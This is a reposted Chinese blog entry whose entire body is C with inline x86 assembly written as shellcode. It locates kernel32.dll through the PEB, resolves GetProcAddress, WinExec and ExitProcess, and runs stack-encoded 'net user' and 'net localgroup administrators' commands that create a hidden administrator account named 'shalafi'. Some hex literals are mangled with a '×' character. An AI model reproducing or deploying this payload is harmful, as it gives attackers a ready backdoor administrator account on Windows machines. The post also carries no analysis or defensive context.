添加一个用户并加至管理员组

精选转载

shiningstar610 2012-02-15 08:22:55

添加一个用户并加至管理员组

#include <windows.h>

int main()
{
__asm{
push ebp
sub esp, 0×40;
mov ebp, esp;

push ebp
mov eax, fs:0×30 ;PEB
mov eax, [eax+0×0c] ;Ldr
mov esi, [eax+0×1c] ;Flink
lodsd
mov edi, [eax+0×08] ;edi = kernel32.dll

mov eax, [edi+3Ch] ;eax = PE首部
mov edx, [edi+eax+78h]
add edx, edi ;edx = 输出表地址
mov ecx, [edx+18h] ;ecx = 输出函数个数
mov ebx, [edx+20h]
add ebx, edi ;ebx = 函数名地址

search:
dec ecx
mov esi, [ebx+ecx*4]
add esi, edi ;依次找每个函数名称
;GetProcAddress
mov eax, 0×50746547
cmp [esi], eax ;‘PteG’
jne search
mov eax, 0×41636f72
cmp [esi+4], eax ;‘Acor’
jne search

;如果是GetProcA，表示找到了
mov ebx, [edx+24h]
add ebx, edi ;ebx = 索引号地址
mov cx, [ebx+ecx*2] ;ecx = 计算出的索引号值
mov ebx, [edx+1Ch]
add ebx, edi ;ebx = 函数地址的起始位置
mov eax, [ebx+ecx*4]
add eax, edi ;用索引值，算GetProcAddress

mov [ebp+40h], eax ;GetProcAddress的地址=ebp+40

push dword ptr 0×00636578 ;构造WinExec
push dword ptr 0×456e6957
push esp
push edi
call [ebp+40h] ;执行GetProcAddress
mov [ebp+8h], eax ;存入WinExec的地址

push dword ptr 0×00737365 ;构造ExitProcess
push dword ptr 0×636f7250
push dword ptr 0×74697845
push esp
push edi
call [ebp+40h] ;执行GetProcAddress
mov [ebp+12h], eax ;存入ExitProcess的地址

push 0
push dword ptr 0
push dword ptr 0×6464612f ;/add
push dword ptr 0×20696661 ;afi
push dword ptr 0×6c616873 ;shal
push dword ptr 0×63736920 ; isc
push dword ptr 0×6966616c ;lafi
push dword ptr 0×61687320 ; sha
push dword ptr 0×72657375 ;user
push dword ptr 0×2074656e ;net
push esp
call [ebp+8h]

push 0
push dword ptr 0×00006464 ;dd
push dword ptr 0×612f2069 ;i /a
push dword ptr 0×66616c61 ;alaf
push dword ptr 0×68732073 ;s sh
push dword ptr 0×726f7461 ;ator
push dword ptr 0×72747369 ;istr
push dword ptr 0×6e696d64 ;dmin
push dword ptr 0×61207075 ;up a
push dword ptr 0×6f72676c ;lgro
push dword ptr 0×61636f6c ;loca
push dword ptr 0×2074656e ;net
push esp
call [ebp+8h]

push 0 ;ExitProcess
call [ebp+12h]
}
return 0;
}